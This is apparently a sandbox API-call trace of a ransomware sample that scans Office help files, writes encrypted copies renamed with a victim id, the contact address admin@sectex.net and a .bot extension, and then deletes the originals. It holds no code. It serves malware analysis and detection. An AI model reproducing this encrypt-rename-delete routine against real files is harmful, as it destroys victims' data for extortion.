	[0148.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.826] lstrlenW (lpString=".zip") returned 4
	[0148.826] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0148.826] lstrlenW (lpString=".rar") returned 4
	[0148.826] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0148.826] lstrlenW (lpString=".bz2") returned 4
	[0148.826] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0148.826] lstrlenW (lpString=".7z") returned 3
	[0148.826] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0148.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.826] lstrlenW (lpString=".dbf") returned 4
	[0148.826] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0148.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.826] lstrlenW (lpString=".1cd") returned 4
	[0148.826] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0148.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OneNoteSyncPCIntl.dll") returned 69
	[0148.826] lstrlenW (lpString=".jpg") returned 4
	[0148.826] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0148.826] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0148.827] lstrlenW (lpString="ONENOTE_COL.HXC") returned 15
	[0148.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.827] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=631) returned 1
	[0148.827] CloseHandle (hObject=0x3f4) returned 1
	[0148.827] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxc")) returned 0x20
	[0148.827] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.828] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.828] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.828] GetLastError () returned 0x0
	[0148.828] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x277, lpOverlapped=0x0) returned 1
	[0148.830] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x280, lpOverlapped=0x0) returned 1
	[0148.831] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.831] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0148.831] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.831] CloseHandle (hObject=0x3d4) returned 1
	[0148.831] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.831] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.833] CloseHandle (hObject=0x3f4) returned 1
	[0148.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.834] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxc")) returned 1
	[0148.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.834] lstrlenW (lpString=".doc") returned 4
	[0148.834] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.834] lstrlenW (lpString=".docx") returned 5
	[0148.834] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.834] lstrlenW (lpString=".pdf") returned 4
	[0148.834] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.834] lstrlenW (lpString=".xls") returned 4
	[0148.834] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.834] lstrlenW (lpString=".xlsx") returned 5
	[0148.834] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.835] lstrlenW (lpString=".ppt") returned 4
	[0148.835] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.835] lstrlenW (lpString=".zip") returned 4
	[0148.835] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.835] lstrlenW (lpString=".rar") returned 4
	[0148.835] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.835] lstrlenW (lpString=".bz2") returned 4
	[0148.835] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.835] lstrlenW (lpString=".7z") returned 3
	[0148.835] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.835] lstrlenW (lpString=".dbf") returned 4
	[0148.835] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.835] lstrlenW (lpString=".1cd") returned 4
	[0148.835] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.835] lstrlenW (lpString=".jpg") returned 4
	[0148.835] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.835] lstrlenW (lpString=".doc") returned 4
	[0148.835] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.835] lstrlenW (lpString=".docx") returned 5
	[0148.835] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.835] lstrlenW (lpString=".pdf") returned 4
	[0148.835] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.835] lstrlenW (lpString=".xls") returned 4
	[0148.835] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.835] lstrlenW (lpString=".xlsx") returned 5
	[0148.836] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.836] lstrlenW (lpString=".ppt") returned 4
	[0148.836] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.836] lstrlenW (lpString=".zip") returned 4
	[0148.836] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.836] lstrlenW (lpString=".rar") returned 4
	[0148.836] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.836] lstrlenW (lpString=".bz2") returned 4
	[0148.836] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.836] lstrlenW (lpString=".7z") returned 3
	[0148.836] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.836] lstrlenW (lpString=".dbf") returned 4
	[0148.836] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.836] lstrlenW (lpString=".1cd") returned 4
	[0148.836] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXC") returned 63
	[0148.836] lstrlenW (lpString=".jpg") returned 4
	[0148.836] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.836] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0148.836] lstrlenW (lpString="ONENOTE_COL.HXT") returned 15
	[0148.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.837] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=207) returned 1
	[0148.838] CloseHandle (hObject=0x3f4) returned 1
	[0148.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxt")) returned 0x20
	[0148.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.838] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.838] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.839] GetLastError () returned 0x0
	[0148.839] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xcf, lpOverlapped=0x0) returned 1
	[0148.840] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0148.840] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.840] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0148.841] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.841] CloseHandle (hObject=0x3d4) returned 1
	[0148.841] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.841] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.843] CloseHandle (hObject=0x3f4) returned 1
	[0148.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.843] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_col.hxt")) returned 1
	[0148.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.844] lstrlenW (lpString=".doc") returned 4
	[0148.844] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.844] lstrlenW (lpString=".docx") returned 5
	[0148.844] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.844] lstrlenW (lpString=".pdf") returned 4
	[0148.844] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.844] lstrlenW (lpString=".xls") returned 4
	[0148.844] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.844] lstrlenW (lpString=".xlsx") returned 5
	[0148.844] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.844] lstrlenW (lpString=".ppt") returned 4
	[0148.844] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.844] lstrlenW (lpString=".zip") returned 4
	[0148.844] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.844] lstrlenW (lpString=".rar") returned 4
	[0148.844] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.845] lstrlenW (lpString=".bz2") returned 4
	[0148.845] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.845] lstrlenW (lpString=".7z") returned 3
	[0148.845] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.845] lstrlenW (lpString=".dbf") returned 4
	[0148.845] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.845] lstrlenW (lpString=".1cd") returned 4
	[0148.845] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.845] lstrlenW (lpString=".jpg") returned 4
	[0148.845] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.845] lstrlenW (lpString=".doc") returned 4
	[0148.845] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.845] lstrlenW (lpString=".docx") returned 5
	[0148.845] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.845] lstrlenW (lpString=".pdf") returned 4
	[0148.845] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.845] lstrlenW (lpString=".xls") returned 4
	[0148.845] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.845] lstrlenW (lpString=".xlsx") returned 5
	[0148.845] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.845] lstrlenW (lpString=".ppt") returned 4
	[0148.845] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.845] lstrlenW (lpString=".zip") returned 4
	[0148.845] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.846] lstrlenW (lpString=".rar") returned 4
	[0148.846] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.846] lstrlenW (lpString=".bz2") returned 4
	[0148.846] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.846] lstrlenW (lpString=".7z") returned 3
	[0148.846] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.846] lstrlenW (lpString=".dbf") returned 4
	[0148.846] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.846] lstrlenW (lpString=".1cd") returned 4
	[0148.846] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_COL.HXT") returned 63
	[0148.846] lstrlenW (lpString=".jpg") returned 4
	[0148.846] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.846] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.846] lstrlenW (lpString="ONENOTE_F_COL.HXK") returned 17
	[0148.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.847] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=114) returned 1
	[0148.847] CloseHandle (hObject=0x3f4) returned 1
	[0148.847] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_f_col.hxk")) returned 0x20
	[0148.847] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.847] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.847] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.848] GetLastError () returned 0x0
	[0148.848] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x72, lpOverlapped=0x0) returned 1
	[0148.851] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.852] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.852] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0148.852] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.852] CloseHandle (hObject=0x3d4) returned 1
	[0148.853] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.853] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.855] CloseHandle (hObject=0x3f4) returned 1
	[0148.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.855] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_f_col.hxk")) returned 1
	[0148.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.856] lstrlenW (lpString=".doc") returned 4
	[0148.856] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.856] lstrlenW (lpString=".docx") returned 5
	[0148.856] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.856] lstrlenW (lpString=".pdf") returned 4
	[0148.856] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.856] lstrlenW (lpString=".xls") returned 4
	[0148.856] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.856] lstrlenW (lpString=".xlsx") returned 5
	[0148.856] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.856] lstrlenW (lpString=".ppt") returned 4
	[0148.856] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.856] lstrlenW (lpString=".zip") returned 4
	[0148.856] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.856] lstrlenW (lpString=".rar") returned 4
	[0148.856] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.856] lstrlenW (lpString=".bz2") returned 4
	[0148.856] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.856] lstrlenW (lpString=".7z") returned 3
	[0148.856] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.856] lstrlenW (lpString=".dbf") returned 4
	[0148.856] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.856] lstrlenW (lpString=".1cd") returned 4
	[0148.856] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.857] lstrlenW (lpString=".jpg") returned 4
	[0148.857] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.857] lstrlenW (lpString=".doc") returned 4
	[0148.857] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.857] lstrlenW (lpString=".docx") returned 5
	[0148.857] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.857] lstrlenW (lpString=".pdf") returned 4
	[0148.857] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.857] lstrlenW (lpString=".xls") returned 4
	[0148.857] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.857] lstrlenW (lpString=".xlsx") returned 5
	[0148.857] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.857] lstrlenW (lpString=".ppt") returned 4
	[0148.857] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.857] lstrlenW (lpString=".zip") returned 4
	[0148.857] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.857] lstrlenW (lpString=".rar") returned 4
	[0148.857] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.857] lstrlenW (lpString=".bz2") returned 4
	[0148.857] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
